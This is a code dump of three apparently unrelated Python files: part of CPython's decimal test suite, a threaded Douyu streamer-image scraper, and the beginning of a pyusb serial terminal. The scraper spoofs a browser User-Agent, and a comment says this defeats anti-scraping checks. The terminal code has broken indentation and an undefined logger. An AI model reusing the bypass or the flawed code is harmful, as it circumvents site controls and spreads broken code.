            self.assertRaises(TypeError, c.is_canonical, 200)
            self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
            self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")

            self.assertEqual(str(c.canonical(Decimal(200))), '200')
            self.assertEqual(c.radix(), 10)

            c.traps[DivisionByZero] = True
            self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
            self.assertRaises(DivisionByZero, c.divmod, 9, 0)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            c.traps[InvalidOperation] = True
            self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
            self.assertRaises(InvalidOperation, c.divmod, 9, 0)
            self.assertTrue(c.flags[DivisionByZero])

            c.traps[InvalidOperation] = True
            c.prec = 2
            self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)

    def test_va_args_exceptions(self):
        """Bad context=/rounding= keyword arguments raise TypeError."""
        Decimal = C.Decimal
        Context = C.Context

        x = Decimal("10001111111")

        for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
                     'logb', 'logical_invert', 'next_minus', 'next_plus',
                     'normalize', 'number_class', 'sqrt', 'to_eng_string']:
            func = getattr(x, attr)
            self.assertRaises(TypeError, func, context="x")
            self.assertRaises(TypeError, func, "x", context=None)

        for attr in ['compare', 'compare_signal', 'logical_and',
                     'logical_or', 'max', 'max_mag', 'min', 'min_mag',
                     'remainder_near', 'rotate', 'scaleb', 'shift']:
            func = getattr(x, attr)
            self.assertRaises(TypeError, func, context="x")
            self.assertRaises(TypeError, func, "x", context=None)

        self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
        self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
        self.assertRaises(TypeError, x.to_integral, [], [])

        self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
        self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
        self.assertRaises(TypeError, x.to_integral_value, [], [])

        self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
        self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
        self.assertRaises(TypeError, x.to_integral_exact, [], [])

        self.assertRaises(TypeError, x.fma, 1, 2, context="x")
        self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)

        self.assertRaises(TypeError, x.quantize, 1, [], context=None)
        self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
        self.assertRaises(TypeError, x.quantize, 1, [], [])

        c = Context()
        self.assertRaises(TypeError, c.power, 1, 2, mod="x")
        self.assertRaises(TypeError, c.power, 1, "x", mod=None)
        self.assertRaises(TypeError, c.power, "x", 2, mod=None)

    @requires_extra_functionality
    def test_c_context_templates(self):
        """The template contexts carry the documented default trap masks."""
        self.assertEqual(
            C.BasicContext._traps,
            C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
            C.DecUnderflow|C.DecClamped
        )
        self.assertEqual(
            C.DefaultContext._traps,
            C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
        )

    @requires_extra_functionality
    def test_c_signal_dict(self):
        """SignalDict mapping protocol and flag/trap <-> int-mask round trips."""
        # SignalDict coverage
        Context = C.Context
        DefaultContext = C.DefaultContext

        InvalidOperation = C.InvalidOperation
        FloatOperation = C.FloatOperation
        DivisionByZero = C.DivisionByZero
        Overflow = C.Overflow
        Subnormal = C.Subnormal
        Underflow = C.Underflow
        Rounded = C.Rounded
        Inexact = C.Inexact
        Clamped = C.Clamped

        DecClamped = C.DecClamped
        DecInvalidOperation = C.DecInvalidOperation
        DecIEEEInvalidOperation = C.DecIEEEInvalidOperation

        def assertIsExclusivelySet(signal, signal_dict):
            # Exactly one signal in the dict is set.
            for sig in signal_dict:
                if sig == signal:
                    self.assertTrue(signal_dict[sig])
                else:
                    self.assertFalse(signal_dict[sig])

        c = DefaultContext.copy()

        # Signal dict methods
        self.assertTrue(Overflow in c.traps)
        c.clear_traps()
        for k in c.traps.keys():
            c.traps[k] = True
        for v in c.traps.values():
            self.assertTrue(v)
        c.clear_traps()
        for k, v in c.traps.items():
            self.assertFalse(v)

        self.assertFalse(c.flags.get(Overflow))
        self.assertIs(c.flags.get("x"), None)
        self.assertEqual(c.flags.get("x", "y"), "y")
        self.assertRaises(TypeError, c.flags.get, "x", "y", "z")

        self.assertEqual(len(c.flags), len(c.traps))
        # Coverage only: the results of sizeof/repr are not inspected.
        s = sys.getsizeof(c.flags)
        s = sys.getsizeof(c.traps)
        s = c.flags.__repr__()

        # Set flags/traps.
        c.clear_flags()
        c._flags = DecClamped
        self.assertTrue(c.flags[Clamped])

        c.clear_traps()
        c._traps = DecInvalidOperation
        self.assertTrue(c.traps[InvalidOperation])

        # Set flags/traps from dictionary.
        c.clear_flags()
        d = c.flags.copy()
        d[DivisionByZero] = True
        c.flags = d
        assertIsExclusivelySet(DivisionByZero, c.flags)

        c.clear_traps()
        d = c.traps.copy()
        d[Underflow] = True
        c.traps = d
        assertIsExclusivelySet(Underflow, c.traps)

        # Random constructors
        IntSignals = {
            Clamped: C.DecClamped,
            Rounded: C.DecRounded,
            Inexact: C.DecInexact,
            Subnormal: C.DecSubnormal,
            Underflow: C.DecUnderflow,
            Overflow: C.DecOverflow,
            DivisionByZero: C.DecDivisionByZero,
            FloatOperation: C.DecFloatOperation,
            InvalidOperation: C.DecIEEEInvalidOperation
        }
        IntCond = [
            C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
            C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
            C.DecConversionSyntax,
        ]

        lim = len(OrderedSignals[C])
        for r in range(lim):
            for t in range(lim):
                for round in RoundingModes:
                    flags = random.sample(OrderedSignals[C], r)
                    traps = random.sample(OrderedSignals[C], t)
                    prec = random.randrange(1, 10000)
                    emin = random.randrange(-10000, 0)
                    emax = random.randrange(0, 10000)
                    clamp = random.randrange(0, 2)
                    caps = random.randrange(0, 2)
                    cr = random.randrange(0, 2)
                    c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
                                capitals=caps, clamp=clamp, flags=list(flags),
                                traps=list(traps))

                    self.assertEqual(c.prec, prec)
                    self.assertEqual(c.rounding, round)
                    self.assertEqual(c.Emin, emin)
                    self.assertEqual(c.Emax, emax)
                    self.assertEqual(c.capitals, caps)
                    self.assertEqual(c.clamp, clamp)

                    f = 0
                    for x in flags:
                        f |= IntSignals[x]
                    self.assertEqual(c._flags, f)

                    f = 0
                    for x in traps:
                        f |= IntSignals[x]
                    self.assertEqual(c._traps, f)

        # Every internal error condition maps onto InvalidOperation.
        for cond in IntCond:
            c._flags = cond
            self.assertTrue(c._flags&DecIEEEInvalidOperation)
            assertIsExclusivelySet(InvalidOperation, c.flags)

        for cond in IntCond:
            c._traps = cond
            self.assertTrue(c._traps&DecIEEEInvalidOperation)
            assertIsExclusivelySet(InvalidOperation, c.traps)

    def test_invalid_override(self):
        """Invalid locale-override dicts passed to __format__ raise ValueError."""
        Decimal = C.Decimal

        try:
            from locale import CHAR_MAX
        except ImportError:
            self.skipTest('locale.CHAR_MAX not available')

        def make_grouping(lst):
            return ''.join([chr(x) for x in lst])

        def get_fmt(x, override=None, fmt='n'):
            return Decimal(x).__format__(fmt, override)

        invalid_grouping = {
            'decimal_point' : ',',
            'grouping' : make_grouping([255, 255, 0]),
            'thousands_sep' : ','
        }
        invalid_dot = {
            'decimal_point' : 'xxxxx',
            'grouping' : make_grouping([3, 3, 0]),
            'thousands_sep' : ','
        }
        invalid_sep = {
            'decimal_point' : '.',
            'grouping' : make_grouping([3, 3, 0]),
            'thousands_sep' : 'yyyyy'
        }

        if CHAR_MAX == 127: # negative grouping in override
            self.assertRaises(ValueError, get_fmt, 12345,
                              invalid_grouping, 'g')

        self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
        self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')

    def test_exact_conversion(self):
        """String exponents beyond the context limits trap as InvalidOperation."""
        Decimal = C.Decimal
        localcontext = C.localcontext
        InvalidOperation = C.InvalidOperation

        with localcontext() as c:
            c.traps[InvalidOperation] = True

            # Clamped
            x = "0e%d" % sys.maxsize
            self.assertRaises(InvalidOperation, Decimal, x)

            x = "0e%d" % (-sys.maxsize-1)
            self.assertRaises(InvalidOperation, Decimal, x)

            # Overflow
            x = "1e%d" % sys.maxsize
            self.assertRaises(InvalidOperation, Decimal, x)

            # Underflow
            x = "1e%d" % (-sys.maxsize-1)
            self.assertRaises(InvalidOperation, Decimal, x)

    def test_from_tuple(self):
        """Tuple construction at the SSIZE limits and with special exponents."""
        Decimal = C.Decimal
        localcontext = C.localcontext
        InvalidOperation = C.InvalidOperation
        Overflow = C.Overflow
        Underflow = C.Underflow

        with localcontext() as c:
            c.traps[InvalidOperation] = True
            c.traps[Overflow] = True
            c.traps[Underflow] = True

            # SSIZE_MAX
            x = (1, (), sys.maxsize)
            self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
            self.assertRaises(InvalidOperation, Decimal, x)

            x = (1, (0, 1, 2), sys.maxsize)
            self.assertRaises(Overflow, c.create_decimal, x)
            self.assertRaises(InvalidOperation, Decimal, x)

            # SSIZE_MIN
            x = (1, (), -sys.maxsize-1)
            self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
            self.assertRaises(InvalidOperation, Decimal, x)

            x = (1, (0, 1, 2), -sys.maxsize-1)
            self.assertRaises(Underflow, c.create_decimal, x)
            self.assertRaises(InvalidOperation, Decimal, x)

            # OverflowError
            x = (1, (), sys.maxsize+1)
            self.assertRaises(OverflowError, c.create_decimal, x)
            self.assertRaises(OverflowError, Decimal, x)

            x = (1, (), -sys.maxsize-2)
            self.assertRaises(OverflowError, c.create_decimal, x)
            self.assertRaises(OverflowError, Decimal, x)

            # Specials
            x = (1, (), "N")
            self.assertEqual(str(Decimal(x)), '-sNaN')
            x = (1, (0,), "N")
            self.assertEqual(str(Decimal(x)), '-sNaN')
            x = (1, (0, 1), "N")
            self.assertEqual(str(Decimal(x)), '-sNaN1')

    def test_sizeof(self):
        """__sizeof__ grows by one machine word per extra coefficient limb."""
        Decimal = C.Decimal
        HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)

        self.assertGreater(Decimal(0).__sizeof__(), 0)
        if HAVE_CONFIG_64:
            x = Decimal(10**(19*24)).__sizeof__()
            y = Decimal(10**(19*25)).__sizeof__()
            self.assertEqual(y, x+8)
        else:
            x = Decimal(10**(9*24)).__sizeof__()
            y = Decimal(10**(9*25)).__sizeof__()
            self.assertEqual(y, x+4)

    def test_internal_use_of_overridden_methods(self):
        """from_float must not call overridden float/int methods internally."""
        Decimal = C.Decimal

        # Unsound subtyping
        class X(float):
            def as_integer_ratio(self):
                return 1
            def __abs__(self):
                return self

        class Y(float):
            def __abs__(self):
                return [1]*200

        class I(int):
            def bit_length(self):
                return [1]*200

        class Z(float):
            def as_integer_ratio(self):
                return (I(1), I(1))
            def __abs__(self):
                return self

        for cls in X, Y, Z:
            self.assertEqual(Decimal.from_float(cls(101.1)),
                             Decimal.from_float(101.1))

    def test_maxcontext_exact_arith(self):
        """Exact operations at maximum precision must not exhaust memory."""
        # Make sure that exact operations do not raise MemoryError due
        # to huge intermediate values when the context precision is very
        # large.

        # The following functions fill the available precision and are
        # therefore not suitable for large precisions (by design of the
        # specification).
        MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus',
                          'logical_and', 'logical_or', 'logical_xor',
                          'next_toward', 'rotate', 'shift']

        Decimal = C.Decimal
        Context = C.Context
        localcontext = C.localcontext

        # Here only some functions that are likely candidates for triggering a
        # MemoryError are tested.  deccheck.py has an exhaustive test.
        maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX)
        with localcontext(maxcontext):
            self.assertEqual(Decimal(0).exp(), 1)
            self.assertEqual(Decimal(1).ln(), 0)
            self.assertEqual(Decimal(1).log10(), 0)
            self.assertEqual(Decimal(10**2).log10(), 2)
            self.assertEqual(Decimal(10**223).log10(), 223)
            self.assertEqual(Decimal(10**19).logb(), 19)
            self.assertEqual(Decimal(4).sqrt(), 2)
            self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5'))
            self.assertEqual(divmod(Decimal(10), 3), (3, 1))
            self.assertEqual(Decimal(10) // 3, 3)
            self.assertEqual(Decimal(4) / 2, 2)
            self.assertEqual(Decimal(400) ** -1, Decimal('0.0025'))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
    """Function signatures"""

    def test_inspect_module(self):
        """Module-level callables have matching signatures in C and P."""
        for attr in dir(P):
            if attr.startswith('_'):
                continue
            p_func = getattr(P, attr)
            c_func = getattr(C, attr)
            if (attr == 'Decimal' or attr == 'Context' or
                inspect.isfunction(p_func)):
                p_sig = inspect.signature(p_func)
                c_sig = inspect.signature(c_func)

                # parameter names (underscore-prefixed Python-only params
                # are ignored):
                c_names = list(c_sig.parameters.keys())
                p_names = [x for x in p_sig.parameters.keys() if not
                           x.startswith('_')]

                self.assertEqual(c_names, p_names,
                                 msg="parameter name mismatch in %s" % p_func)

                c_kind = [x.kind for x in c_sig.parameters.values()]
                p_kind = [x[1].kind for x in p_sig.parameters.items() if not
                          x[0].startswith('_')]

                # parameters:
                if attr != 'setcontext':
                    self.assertEqual(c_kind, p_kind,
                                     msg="parameter kind mismatch in %s" % p_func)

    def test_inspect_types(self):
        """Decimal/Context method signatures match and are callable as shown."""

        POS = inspect._ParameterKind.POSITIONAL_ONLY
        POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD

        # Type heuristic (type annotations would help!): map each known
        # parameter name to a plausible argument value for that module.
        pdict = {C: {'other': C.Decimal(1),
                     'third': C.Decimal(1),
                     'x': C.Decimal(1),
                     'y': C.Decimal(1),
                     'z': C.Decimal(1),
                     'a': C.Decimal(1),
                     'b': C.Decimal(1),
                     'c': C.Decimal(1),
                     'exp': C.Decimal(1),
                     'modulo': C.Decimal(1),
                     'num': "1",
                     'f': 1.0,
                     'rounding': C.ROUND_HALF_UP,
                     'context': C.getcontext()},
                 P: {'other': P.Decimal(1),
                     'third': P.Decimal(1),
                     'a': P.Decimal(1),
                     'b': P.Decimal(1),
                     'c': P.Decimal(1),
                     'exp': P.Decimal(1),
                     'modulo': P.Decimal(1),
                     'num': "1",
                     'f': 1.0,
                     'rounding': P.ROUND_HALF_UP,
                     'context': P.getcontext()}}

        def mkargs(module, sig):
            # Build (args, kwargs) for a call matching the signature.
            args = []
            kwargs = {}
            for name, param in sig.parameters.items():
                if name == 'self': continue
                if param.kind == POS:
                    args.append(pdict[module][name])
                elif param.kind == POS_KWD:
                    kwargs[name] = pdict[module][name]
                else:
                    raise TestFailed("unexpected parameter kind")
            return args, kwargs

        def tr(s):
            """The C Context docstrings use 'x' in order to prevent confusion
               with the article 'a' in the descriptions."""
            if s == 'x': return 'a'
            if s == 'y': return 'b'
            if s == 'z': return 'c'
            return s

        def doit(ty):
            # Compare every public method of P.<ty> against C.<ty>.
            p_type = getattr(P, ty)
            c_type = getattr(C, ty)
            for attr in dir(p_type):
                if attr.startswith('_'):
                    continue
                p_func = getattr(p_type, attr)
                c_func = getattr(c_type, attr)
                if inspect.isfunction(p_func):
                    p_sig = inspect.signature(p_func)
                    c_sig = inspect.signature(c_func)

                    # parameter names:
                    p_names = list(p_sig.parameters.keys())
                    c_names = [tr(x) for x in c_sig.parameters.keys()]

                    self.assertEqual(c_names, p_names,
                                     msg="parameter name mismatch in %s" % p_func)

                    p_kind = [x.kind for x in p_sig.parameters.values()]
                    c_kind = [x.kind for x in c_sig.parameters.values()]

                    # 'self' parameter:
                    self.assertIs(p_kind[0], POS_KWD)
                    self.assertIs(c_kind[0], POS)

                    # remaining parameters:
                    if ty == 'Decimal':
                        self.assertEqual(c_kind[1:], p_kind[1:],
                                         msg="parameter kind mismatch in %s" % p_func)
                    else: # Context methods are positional only in the C version.
                        self.assertEqual(len(c_kind), len(p_kind),
                                         msg="parameter kind mismatch in %s" % p_func)

                    # Run the function:
                    args, kwds = mkargs(C, c_sig)
                    try:
                        getattr(c_type(9), attr)(*args, **kwds)
                    except Exception:
                        raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))

                    args, kwds = mkargs(P, p_sig)
                    try:
                        getattr(p_type(9), attr)(*args, **kwds)
                    except Exception:
                        raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))

        doit('Decimal')
        doit('Context')
# The list alternates C and Python variants of each test class, so that
# slicing with [1::2] below keeps exactly the Python-only tests.
all_tests = [
  CExplicitConstructionTest, PyExplicitConstructionTest,
  CImplicitConstructionTest, PyImplicitConstructionTest,
  CFormatTest,               PyFormatTest,
  CArithmeticOperatorsTest,  PyArithmeticOperatorsTest,
  CThreadingTest,            PyThreadingTest,
  CUsabilityTest,            PyUsabilityTest,
  CPythonAPItests,           PyPythonAPItests,
  CContextAPItests,          PyContextAPItests,
  CContextWithStatement,     PyContextWithStatement,
  CContextFlags,             PyContextFlags,
  CSpecialContexts,          PySpecialContexts,
  CContextInputValidation,   PyContextInputValidation,
  CContextSubclassing,       PyContextSubclassing,
  CCoverage,                 PyCoverage,
  CFunctionality,            PyFunctionality,
  CWhitebox,                 PyWhitebox,
  CIBMTestCases,             PyIBMTestCases,
]

# Delete C tests if _decimal.so is not present.
if not C:
    all_tests = all_tests[1::2]
else:
    # C-only test classes, run first.
    all_tests.insert(0, CheckAttributes)
    all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
    """ Execute the tests.

    Runs all arithmetic tests if arith is True or if the "decimal" resource
    is enabled in regrtest.py
    """

    init(C)
    init(P)
    global TEST_ALL, DEBUG
    TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
    DEBUG = debug

    if todo_tests is None:
        test_classes = all_tests
    else:
        # Only the data-driven .decTest cases are run in todo mode.
        test_classes = [CIBMTestCases, PyIBMTestCases]

    # Dynamically build custom test definition for each file in the test
    # directory and add the definitions to the DecimalTest class. This
    # procedure insures that new files do not get skipped.
    for filename in os.listdir(directory):
        if '.decTest' not in filename or filename.startswith("."):
            continue
        head, tail = filename.split('.')
        if todo_tests is not None and head not in todo_tests:
            continue
        # f=filename binds the current file name at definition time
        # (avoids the late-binding closure pitfall).
        tester = lambda self, f=filename: self.eval_file(directory + f)
        setattr(CIBMTestCases, 'test_' + head, tester)
        setattr(PyIBMTestCases, 'test_' + head, tester)
    del filename, head, tail, tester

    try:
        run_unittest(*test_classes)
        if todo_tests is None:
            from doctest import IGNORE_EXCEPTION_DETAIL
            # Run the doctests with sys.modules['decimal'] pointing at the
            # implementation under test, then restore it.
            savedecimal = sys.modules['decimal']
            if C:
                sys.modules['decimal'] = C
                run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
            sys.modules['decimal'] = P
            run_doctest(P, verbose)
            sys.modules['decimal'] = savedecimal
    finally:
        # Always restore the contexts saved at import time.
        if C: C.setcontext(ORIGINAL_CONTEXT[C])
        P.setcontext(ORIGINAL_CONTEXT[P])
        if not C:
            warnings.warn('C tests skipped: no module named _decimal.',
                          UserWarning)
        if not orig_sys_decimal is sys.modules['decimal']:
            raise TestFailed("Internal error: unbalanced number of changes to "
                             "sys.modules['decimal'].")
if __name__ == '__main__':
    import optparse
    p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
    p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
    p.add_option('--skip',  '-s', action='store_true', help='skip over 90% of the arithmetic tests')
    (opt, args) = p.parse_args()

    if opt.skip:
        # Fast run: non-arithmetic tests only.
        test_main(arith=False, verbose=True)
    elif args:
        # Run only the named .decTest groups.
        test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
    else:
        # Full run.
        test_main(arith=True, verbose=True)
|
net07_douyu_threading.py | """多线程抓取斗鱼美女主播首页美女主播图片"""
'''
@Time : 2018/1/23 下午5:59
@Author : scrappy_zhang
@File : net07_douyu_threading.py
'''
import urllib.request
import re
import time
import threading
max_retry_count = 3
def down_img(url):
    """
    Download one image into the local ``img/`` directory.

    e.g. https://rpic.douyucdn.cn/live-cover/appCovers/2017/10/24/12017.jpg

    Retries up to ``max_retry_count`` times on any error; gives up
    silently after that (best-effort, matches original behaviour).
    """
    import os
    # Make sure the target directory exists; previously a missing img/
    # directory made every attempt fail with FileNotFoundError.
    os.makedirs("img", exist_ok=True)
    for _ in range(max_retry_count):
        try:
            # Use a context manager so the HTTP response is always closed.
            with urllib.request.urlopen(url) as response:
                # bytes
                data = response.read()
            # Derive the file name from the last path component of the URL.
            file_name = url[url.rfind('/') + 1:]
            # Write the payload to disk.
            with open("img/" + file_name, "wb") as file:
                file.write(data)
        except Exception as e:
            print("出错 %s 正在重试" % e)
        else:
            break
if __name__ == '__main__':
    start = time.time()  # approximate program start time
    home = """https://www.douyu.com/directory/game/yz?page=1&isAjax=1"""  # index page URL
    # Request headers: a browser User-Agent defeats basic anti-scraping checks.
    headers = {
        "Host": "www.douyu.com",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/62.0.3202.94 Safari/537.36"
    }
    # Build the request object and submit it; the response is the index HTML.
    request = urllib.request.Request(url=home, headers=headers)
    # urlopen accepts either a URL string or a prepared Request object.
    response = urllib.request.urlopen(request)
    # Read the response bytes and decode them to text.
    html_data = response.read().decode()
    # Extract every image link from the page with a regex.
    img_list = re.findall(r"https://.*?\.(?:jpg)", html_data)
    # Download each image on its own thread.
    threads = []
    for img_url in img_list:
        td = threading.Thread(target=down_img, args=(img_url,))
        td.start()
        threads.append(td)
    # Fix: the original spun on len(threading.enumerate()) with no sleep,
    # pegging a CPU core; joining each worker waits with no busy loop.
    for td in threads:
        td.join()
    end = time.time()  # approximate program end time
    print('耗时:', end - start)
|
vcp_terminal.py | #!/usr/bin/env python
"""
VIRTUAL COM PORT TERMINAL
- implements a read/write terminal for communicating
with pyusb devices
SERIAL STATE notifications (2 bytes, interrupt endpoint)
15..7 - reserved
6 bOverRun Received data has been discarded due to a device overrun
5 bParity A parity error has occurred
4 bFraming A framing error has occurred
3 bRingSignal State of the ring indicator (RI)
2 bBreak Break state
1 bTxCarrier State of the data set ready (DSR)
0 bRxCarrier State of carrier detect (CD)
Line Coding Data Field (7 bytes, control endpoint)
offset field (bytes) Description
--------------------------------------------------------------------
0 dwDTERate 4 bit rate (bits per second)
4 bCharFormat 1 stop bits (0 : 1bit, 1, 1.5bits, 2, 2bits)
5 bParityType 1 0:None, 1:Odd, 2:Even, 3:Mark, 4:Space
6 bDataBits 1 5, 6, 7, 8, 16
Control Line State Field (2 bytes, control endpoint)
wValueBit Description (2 bytes data)
---------------------------
bit 1 = 0 RTS : de-assert (negative voltage)
bit 1 = 1 RTS : assert (positive voltage)
bit 0 = 0 DTR : de-assert (negative voltage)
bit 0 = 1 DTR : assert (positive voltage)
This tool can be 'compiled' into a windows binary using the following commands
>>> from distutils.core import setup
>>> import py2exe
>>> setup(console=['vcp_terminal.py'])
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from __future__ import unicode_literals
import os
import sys
import time
import usb.core as usb
import threading
import logging
try:
import Queue as queue
except ImportError:
import queue
# USB CDC class-specific request codes (bRequest values) used on the
# control endpoint; names and codes follow the USB CDC specification.
CDC_CMDS = {
    "SEND_ENCAPSULATED_COMMAND": 0x00,
    "GET_ENCAPSULATED_RESPONSE": 0x01,
    "SET_COMM_FEATURE": 0x02,
    "GET_COMM_FEATURE": 0x03,
    "CLEAR_COMM_FEATURE": 0x04,
    "SET_LINE_CODING": 0x20,
    "GET_LINE_CODING": 0x21,
    "SET_CONTROL_LINE_STATE": 0x22,
    "SEND_BREAK": 0x23,  # wValue is break time
}
class _Getch(object):
    """Read a single keypress from stdin without echoing it.

    Delegates to a platform-specific implementation chosen at
    construction time.
    """

    def __init__(self):
        # Prefer the Windows implementation; constructing it raises
        # ImportError when msvcrt is unavailable, in which case we fall
        # back to the termios-based POSIX reader.
        try:
            impl = _GetchWindows()
        except ImportError:
            impl = _GetchUnix()
        self.impl = impl

    def __call__(self):
        return self.impl()
class _GetchUnix(object):
    """Read one raw character from stdin on POSIX systems."""

    def __call__(self):
        import sys
        import tty
        import termios
        stdin_fd = sys.stdin.fileno()
        # Remember the terminal settings so they can be restored even if
        # the raw-mode read fails.
        saved_settings = termios.tcgetattr(stdin_fd)
        try:
            tty.setraw(stdin_fd)
            key = sys.stdin.read(1)
        finally:
            termios.tcsetattr(stdin_fd, termios.TCSADRAIN, saved_settings)
        return key
class _GetchWindows(object):
    """Read one character via msvcrt on Windows.

    Importing msvcrt in __init__ makes construction raise ImportError on
    non-Windows platforms, which _Getch uses to pick an implementation.
    """

    def __init__(self):
        import msvcrt  # availability probe only

    def __call__(self):
        import msvcrt
        return msvcrt.getch()
class ComPort(object):
    """CDC-ACM / FTDI virtual COM port wrapper around a pyusb device.

    A daemon thread polls the bulk IN endpoint and buffers incoming bytes
    in a queue; writes go straight to the bulk OUT endpoint. Line coding
    and control-line state are set via control-endpoint requests, using
    either CDC class requests or FTDI vendor requests.
    """

    def __init__(self, usb_device, start=True):
        """Locate the data interface and endpoints; optionally start rx.

        usb_device -- a pyusb Device
        start      -- start polling the IN endpoint immediately
        """
        self.device = usb_device
        self._isFTDI = False
        self._rxinterval = 0.005  # sec, polling period of the rx thread
        self._rxqueue = queue.Queue()
        self._rxthread = None
        self._rxactive = False
        # Cached line parameters (defaults until set/getLineCoding runs).
        self.baudrate = 9600
        self.parity = 0
        self.stopbits = 1
        self.databits = 8
        cfg = usb_device.get_active_configuration()
        if self.device.idVendor == 0x0403:  # FTDI device
            self._isFTDI = True
            log.debug("Configuring as an FTDI device, no cmd itf")
            cmd_itfs = None
            # FTDI exposes its serial function on a vendor-specific (0xFF)
            # interface; there is no separate command interface.
            data_itfs = list(usb.util.find_descriptor(
                cfg, find_all=True,
                custom_match=lambda e: (e.bInterfaceClass == 0xFF)))
            data_itf = data_itfs[0]
            itf_num = data_itf.bInterfaceNumber
        else:
            # CDC: class 0x0A is the data interface, 0x02 the command one.
            data_itfs = list(
                usb.util.find_descriptor(
                    cfg,
                    find_all=True,
                    custom_match=lambda e: (
                        e.bInterfaceClass == 0xA)))
            if not data_itfs:
                print("Unable to connect. No data interfaces on device")
                exit()
            data_itf = data_itfs[0]
            cmd_itfs = list(
                usb.util.find_descriptor(
                    cfg,
                    find_all=True,
                    custom_match=lambda e: (
                        e.bInterfaceClass == 0x2)))
            itf_num = cmd_itfs[0].bInterfaceNumber
            if len(cmd_itfs) != len(data_itfs):
                log.debug("COM port data / command interface mismatch")
        ports = len(data_itfs)
        log.debug("found {0} COM port\n".format(ports))
        try:
            # The kernel's own serial driver may already own the interface.
            self.device.detach_kernel_driver(itf_num)
        except usb.USBError:
            pass
        except NotImplementedError:
            pass  # some backends (e.g. Windows) don't implement this
        # Bit 7 of bEndpointAddress set means IN endpoint.
        self._ep_in = usb.util.find_descriptor(
            data_itf, custom_match=lambda e: (
                e.bEndpointAddress & 0x80))
        self._ep_out = usb.util.find_descriptor(
            data_itf, custom_match=lambda e: not (
                e.bEndpointAddress & 0x80))
        if start:
            self._startRx()

    def _startRx(self):
        """Start the receive thread (no-op if one is already running)."""
        if self._rxthread is not None and (
                # Fix: Thread.isAlive() was removed in Python 3.9.
                self._rxactive or self._rxthread.is_alive()):
            return
        self._rxactive = True
        self._rxthread = threading.Thread(target=self._read)
        self._rxthread.daemon = True
        self._rxthread.start()

    def _endRx(self):
        """Ask the receive thread to exit after its current iteration."""
        self._rxactive = False

    def _read(self):
        """ check ep for data, add it to queue and sleep for interval """
        while self._rxactive:
            try:
                rv = self._ep_in.read(self._ep_in.wMaxPacketSize)
                if self._isFTDI:
                    status = rv[:2]  # FTDI prepends 2 flow control characters,
                    # modem status and line status of the UART
                    if status[0] != 1 or status[1] != 0x60:
                        log.info(
                            "USB Status: 0x{0:02X} 0x{1:02X}".format(
                                *status))
                    rv = rv[2:]
                for rvi in rv:
                    self._rxqueue.put(rvi)
            except usb.USBError as e:
                # NOTE(review): a plain read timeout also raises USBError,
                # which permanently stops this thread -- confirm intended.
                log.warning("USB Error on _read {}".format(e))
                return
            time.sleep(self._rxinterval)

    def _getRxLen(self):
        """Number of received bytes currently buffered."""
        return self._rxqueue.qsize()
    rxlen = property(fget=_getRxLen)

    def readBytes(self):
        """Drain and return the receive buffer as a list of ints."""
        rx = []
        while not self._rxqueue.empty():
            rx.append(self._rxqueue.get())
        return rx

    def readText(self):
        """Drain the receive buffer and return it decoded as text."""
        return "".join(chr(c) for c in self.readBytes())

    def write(self, data):
        """Write *data* to the OUT endpoint, logging short writes."""
        try:
            ret = self._ep_out.write(data)
        except usb.USBError as e:
            log.warning("USB Error on write {}".format(e))
            return
        if len(data) != ret:
            log.error(
                "Bytes written mismatch {0} vs {1}".format(
                    len(data), ret))
        else:
            log.debug("{} bytes written to ep".format(ret))

    def setControlLineState(self, RTS=None, DTR=None):
        """Assert / de-assert the RTS and DTR control lines.

        For FTDI devices the high byte carries the 'this value is valid'
        mask bits; for CDC this is the SET_CONTROL_LINE_STATE request.
        """
        ctrlstate = (2 if RTS else 0) + (1 if DTR else 0)
        if self._isFTDI:
            ctrlstate += (1 << 8) if DTR is not None else 0
            ctrlstate += (2 << 8) if RTS is not None else 0
        txdir = 0  # 0:OUT, 1:IN
        req_type = 2 if self._isFTDI else 1  # 0:std, 1:class, 2:vendor
        # 0:device, 1:interface, 2:endpoint, 3:other
        recipient = 0 if self._isFTDI else 1
